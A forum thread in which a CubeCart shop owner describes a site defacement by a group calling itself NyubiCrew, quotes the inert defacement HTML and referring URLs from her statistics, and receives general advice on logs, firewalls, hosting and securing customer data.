Cart Hacked

[Guest potterygirl]

Found this along with a index.html file that stated my site was hacked by this group below.

I am NO longer using Cube Cart as I took the appropriate measures in the documentation to lock down my site.

This all started when I added my site to the "gallery" on the cube cart home page. Just an FYI for those who want to add theirs in the future.

[Guest EverythingWeb]

Well, what version were you using and any 3rd party mods?

[Guest]

I also wonder what version you were using and if the file and image the only thing they did? If so, it's possible it's all they could do - a lot milder than hacks I've had in the past, mostly of phpnuke rather than cubecart.

I've been listed in the showcase for years and hackers can find you anywhere from any search engine so I wouldn't necessarily say it was from that.

[Guest potterygirl]

I also wonder what version you were using and if the file and image the only thing they did? If so, it's possible it's all they could do - a lot milder than hacks I've had in the past, mostly of phpnuke rather than cubecart.

I've been listed in the showcase for years and hackers can find you anywhere from any search engine so I wouldn't necessarily say it was from that.

Thank you for replying! Yes it was a mild exploit, I agree. But still has shaken my trust! I have used cc for a while now and also keep it current as far as versions and permissions are set appropriately. They also added an html file so that their cronies can see their work.

Do a google of " hacked by nyubicrew" and see how many cube carts have been hacked. I am certain most have no clue they have been hacked.

[Guest Dazzle]

Ok, that has me more than just a little nervous. I just did the Google search and yes..they have been around...and the first place I saw was a cube cart.. a florist, that appears to have been hacked and I doubt they are even aware of it.

Below is just one area:

About Us

nyubicrew was founded in 2003 in Sofia, Bulgaria.

nyubicrew shop deliver bouquets of fresh flowers, baskets or hampers, floral arrangements, vases or boxes throughout Sofia. We can arrange the delivery of flowers today or tomorrow to anyone in Sofia for any occasion.

We were close to opening our shop and now I am quite scared.

[Guest potterygirl]

Like I said earlier, I AM RUNNING THE LATEST VERSION OF CUBE CART! ALL PERMISSIONS ARE SET correctly.

None of my other carts that I have on my server that I use to test templates were messed with. The administration wasn't messed with either. NONE of my other files were infiltrated on my server.

I USE A PASSWORD generator that I have on my computer that I generate for myself and I routinely change them out. I am NOT stupid enough to use my dotcom name and for user name and password. The strength of my passwords are very strong.

I am VERY certain that all this occurred when I listed my site on the gallery. In 4 years of having an online store, I NEVER NEVER NEVER had any "test" orders or fake orders on my cart.

[vokf]

If you're running store without a licence, you where probably found from the "powered by cubecart" title,

its probably quicker to search for that in Google than crawl through the gallery.

Ok, so if you are running 3.0.16 or 3.0.17, and on a shared server - check your raw access logs. You many find how they gained access. Typically this could be a strange looking URL to your store.

Even though CC has been security audited, I doubt any mods have been: ie they may have entered via a 3rd party mod -which is the base cubecart code cannot protect against.

Does the server have any brute force detection in place? Is the server up-to-date with patches - and has a decent security system in place?

I'd personally chat to your hosting company, they may be able to investigate for you.

I'm sorry to hear this has happened, and if you find the cause, please contact Devillon with your findings (as opposed to posting here)

Jason

[Guest]

potterygirl, if you haven't read the stickied post -- Anatomy of a Hack. I've not seen any genuine hacks against CubeCart files. I've seen hack files stored in the world-writable directories of CubeCart, but that in no way indicates that they came from a vulnerability in CubeCart.

Check the logs. Have your hosting company check their logs and also any tmp directories for bogus files. I've more than once found attacking files in server tmp folders that then searched for EVERY world-writable directory on the server and loaded malware into them.

Don't shoot the messenger.

:pirate:

[Guest]

Semantics of hacking aside for a moment - most hacks require multiple flaws in security to succeed. The most basic defense is a firewall. I'm betting your server has unrestricted outbound access - never a good thing. This allows the server to originate "new calls" to other servers on the 'net (such as making a connection to an IRC channel via port 6667 for example).

Whilst I can understand you getting upset at the fact you were hacked, first, put it into context. Unless you were targeted specifically (and you are likely to know if that was the case), then the hackers are likely just defacers (especially if they did nothing more than say greetz to whoever). It is a notoriety thing, rather than a criminal thing (although breaking into a website and defacing it is a criminal act).

If however, the attack was more subtle, or "silent" (i.e. no obvious site defacement, or attempts to install rootkits/trojans on the server) then the attack is possibly more severe, as the purpose is information theft, leading to fraud/ID theft. To this group of people two things are very bad for them:

* A broken server yields no info for them to steal, and they get noticed, and the server fixed

* If they deface the site, again, they get noticed and the server fixed etc..

Both result in no data for them to exploit, so they want as little notice taking of them as possible, and they want the system to remain functional.

As Sir William above says - trawl your raw server logs (your web server logs are a great place to start) and see what activity has been taking place on the server. Look for patterns. It might have been some time before they actually broke in (if it was serious) or it could be a lucky break by a few script kiddies, which means the attacks would have started around the time they succeeded.

Above all - keep your cool. If in doubt, ask your host to re-install the latest version of the operating system, and ensure all servers etc.. are up to date. Get a firewall installed, too (or use IPTables on Linux) to restrict access to the system. Disable remote root access if you don't need it for extra security. Once hackers have root access, they can do what they like.

Best regards,

AstroTux.

[Guest potterygirl]

potterygirl, if you haven't read the stickied post -- Anatomy of a Hack. I've not seen any genuine hacks against CubeCart files. I've seen hack files stored in the world-writable directories of CubeCart, but that in no way indicates that they came from a vulnerability in CubeCart.

Check the logs. Have your hosting company check their logs and also any tmp directories for bogus files. I've more than once found attacking files in server tmp folders that then searched for EVERY world-writable directory on the server and loaded malware into them.

Don't shoot the messenger.

LOL at the "don't shoot the messenger"... are you kidding? You guys always have the answers....

Yep I read the pinned FAQ (a while back prior to finding all this) on "anatomy of a hack" etc. And yes as I posted after my initial post, that it was more of an exploit than a hack. And yes I totally agree that the whole thing is more of a "hey, look what I can do" exploit to the other stupid hackers in the world.

Thanks for letting me vent and also sharing your insights on the matter. I am going to check my other logs and see about who/when the accessing might have occured. I DID pin it down to when it was posted....which correlates along with the gallery posting (I posted here asking if others had a terrible time with fake orders from being in the gallery!)...the timing is within the same time frame.

It's just soooooo irritating and feels like someone has been and burglarized one's home or something....

[Guest potterygirl]

Okay, perusing through some files and logs...in my AWstats there are numerous weird links that reference to my site from other sites "(Links from an external page (other web sites except search engines)"

When you click on them, (for example...to go to the site http://new.linuxgames.ru/) it tries to access my site (I password protected my Cube Cart file) the logon credentials pop up window shows up trying to access my Cube cart files...

Here's the AW stats results...each one when I click on them tries to link back to my CC files...:

- http://new.linuxgames.ru 0 2

- http://www.autoscan.com.ua/index.php 0 3

- http://autoscan.com.ua/administrator/ 0 5

- http://1958auction.com 0 2

- http://castle.suiteone.com/~adomaha/ 0 7

- http://c3motorsport.com 0 12

- http://hqformod.com/index.php 0 2

- http://www.frozenmidnightsupport.com 0 4

- http://www.rpl-smkn1dps.net/cache/ 0 8

- http://frozenmidnightsupport.com 0 7

- http://tahiti.org 0 18

- http://www.autoscan.com.ua/administrator/ 0 2

- Others

So what does this all mean?

[Guest]

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>--=[Indonesia Hacker]=--</title>

<style type="text/css">

<!--

body,td,th {

	color: #00FF00;

	font-family: Verdana, Arial, Helvetica, sans-serif;

}

body {

	background-color: #000000;

}

.style1 {color: #FF0000}

.style2 {color: #FFFFFF}

-->

</style></head>



<body>

<br />

<br />

<div align="center">&lt;==[ Hacked By NyubiCrew]==&gt; <br />

  <table width="100">



	<tr>

	  <td><img src="http://www.clayandsoapstudio.com/cc3/solpot.jpg" width="282" height="284" /></td>

	</tr>

  </table>

	<span class="style1"><br />

	HUT</span> <span class="style2">RI</span> 17-Agustus-1945 <br />



	MerDeka !!!<br />

	<span class="style1">Indo</span><span class="style2">nesia</span><br />

	<br />

</div>

</body>

</html>

That is what is in the page when I attempt to view it.

http://www.clayandsoapstudio.com/cc3/solpot.jpg

^^^ Is that your site???

When I attempt to view that site, it asks for login. Clicking Cancel gives me a 401 error (both for the file, the cc3 directory and the root docs folder).

What is solpot.jpg??

Best regards,

AstroTux.

[Guest]

List of IPs associated with each domain name listed above:

193.178.145.191

~~~~~~~~~~~~~~~

autoscan.com.ua

www.autoscan.com.ua





206.221.179.190

~~~~~~~~~~~~~~~

1958auction.com

c3motorsport.com





69.16.208.191

~~~~~~~~~~~~~

castle.suiteone.com





62.118.250.230

~~~~~~~~~~~~~~

new.linuxgames.ru





hgformod.com - Unable to resolve target host





208.101.25.232

~~~~~~~~~~~~~~

www.frozenmidnightsupport.com

frozenmidnightsupport.com





70.84.54.58

~~~~~~~~~~~

www.rpl-smkn1dps.net





67.19.167.130

~~~~~~~~~~~~~

tahiti.org

Best regards,

AstroTux.

[Guest potterygirl]

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>--=[Indonesia Hacker]=--</title>

<style type="text/css">

<!--

body,td,th {

	color: #00FF00;

	font-family: Verdana, Arial, Helvetica, sans-serif;

}

body {

	background-color: #000000;

}

.style1 {color: #FF0000}

.style2 {color: #FFFFFF}

-->

</style></head>



<body>

<br />

<br />

<div align="center">&lt;==[ Hacked By NyubiCrew]==&gt; <br />

  <table width="100">



	<tr>

	  <td><img src="http://www.clayandsoapstudio.com/cc3/solpot.jpg" width="282" height="284" /></td>

	</tr>

  </table>

	<span class="style1"><br />

	HUT</span> <span class="style2">RI</span> 17-Agustus-1945 <br />



	MerDeka !!!<br />

	<span class="style1">Indo</span><span class="style2">nesia</span><br />

	<br />

</div>

</body>

</html>

That is what is in the page when I attempt to view it.

http://www.clayandsoapstudio.com/cc3/solpot.jpg

^^^ Is that your site???



When I attempt to view that site, it asks for login. Clicking Cancel gives me a 401 error (both for the file, the cc3 directory and the root docs folder).



What is solpot.jpg??



Best regards,

AstroTux.

yes my site was clayandsoapstudio.com. I have no clue about the solpot either. That is theimage they deposited on my site.

^^^ Is that your site???

When I attempt to view that site, it asks for login. Clicking Cancel gives me a 401 error (both for the file, the cc3 directory and the root docs folder).

What is solpot.jpg??

Best regards,

AstroTux.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>--=[Indonesia Hacker]=--</title>

<style type="text/css">

<!--

body,td,th {

	color: #00FF00;

	font-family: Verdana, Arial, Helvetica, sans-serif;

}

body {

	background-color: #000000;

}

.style1 {color: #FF0000}

.style2 {color: #FFFFFF}

-->

</style></head>



<body>

<br />

<br />

<div align="center">&lt;==[ Hacked By NyubiCrew]==&gt; <br />

  <table width="100">



	<tr>

	  <td><img src="http://www.clayandsoapstudio.com/cc3/solpot.jpg" width="282" height="284" /></td>

	</tr>

  </table>

	<span class="style1"><br />

	HUT</span> <span class="style2">RI</span> 17-Agustus-1945 <br />



	MerDeka !!!<br />

	<span class="style1">Indo</span><span class="style2">nesia</span><br />

	<br />

</div>

</body>

</html>

That is what is in the page when I attempt to view it.

http://www.clayandsoapstudio.com/cc3/solpot.jpg

yes my site was clayandsoapstudio.com. I have no clue about the solpot either. That is theimage they deposited on my site.

I locked down the cube cart folder once I found these redirects back to my cart file.

[Guest]

Hi,

That does look suspicious (I know that is stating the obvious), but for all the different sites to point back at yours - maybe it is a way of them advertising that they've hacked your site specifically??

Move your cart directory from domain/cc3 to something else. Put a server authentication requirement on the admin folder at least, and if using MySQL for the data files, look at using file encryption for the actual files themselves. That will take a little setting up in order to allow the MySQL service to read the encrypted files, but that way, if they do end up getting root access for whatever reason (at that point it's too late for your server) then at least the sensitive customer files can't be accessed. Don't forget that you have a legal obligation here to ensure that all customer data is kept confidential. I'd argue in any court that use of file encryption is the best you can do, and if that gets broken - well - you tried. Anything that is online is a risk - you just have to take reasonable steps to keep it as secure as possible.

You did the right thing restricting the site until this is resolved, but obviously your business can't continue that way.

If your host seems difficult or refuses to install some serious security for your server without additional cost - find another host. Some places don't take security seriously and expect you to have all the answers. Some places say "you supply the hardware and we'll install it" but that is additional expense for yourself and should be standard IMHO. The way I see it is that they are their servers - they have the responsibility to YOU to ensure they don't get hacked (within reasonable limits - nothing is 100% secure except for the machine and data that don't exist).

Send a letter/email to your host, and if they don't play ball - find one who will.

Best regards,

AstroTux.

[Guest potterygirl]

Hi,

That does look suspicious (I know that is stating the obvious), but for all the different sites to point back at yours - maybe it is a way of them advertising that they've hacked your site specifically??

Move your cart directory from domain/cc3 to something else. Put a server authentication requirement on the admin folder at least, and if using MySQL for the data files, look at using file encryption for the actual files themselves. That will take a little setting up in order to allow the MySQL service to read the encrypted files, but that way, if they do end up getting root access for whatever reason (at that point it's too late for your server) then at least the sensitive customer files can't be accessed. Don't forget that you have a legal obligation here to ensure that all customer data is kept confidential. I'd argue in any court that use of file encryption is the best you can do, and if that gets broken - well - you tried. Anything that is online is a risk - you just have to take reasonable steps to keep it secure.

You did the right thing restricting the site until this is resolved, but obviously your business can't continue that way.

If your host seems difficult or refuse to install some serious security for your server without additional cost - find another host. Some places don't take security seriously and expect you to have all the answers. Some places say "you supply the hardware and we'll install it" but that is additional expense for yourself and should be standard IMHO. The way I see it is that they are their servers - they have the responsibility to YOU to ensure they don't get hacked (within reasonable limits - nothing is 100% secure except for the machine and data that don't exist).

Send a letter/email to your host, and if they don't play ball - find one who will.

Best regards,

AstroTux.

Thank you Astro! I am moving things over today to a new cart. I was inline to revamp my cart anyway, so here's to Visine for the a.m.! Yep, all that fancy coding I did to the skins to make it look so Vogue! ROTFLMAO....I guess the Indonesians thought I looked like bath and body works! HAHAHAHAHAHA! Yeah right! Geez!

Thanks to all who posted. I removed the files from my cart so maybe those links won't work correctly anymore. I am sure the owners of those other sites are wondering what's going on too??? If those are real sites that is.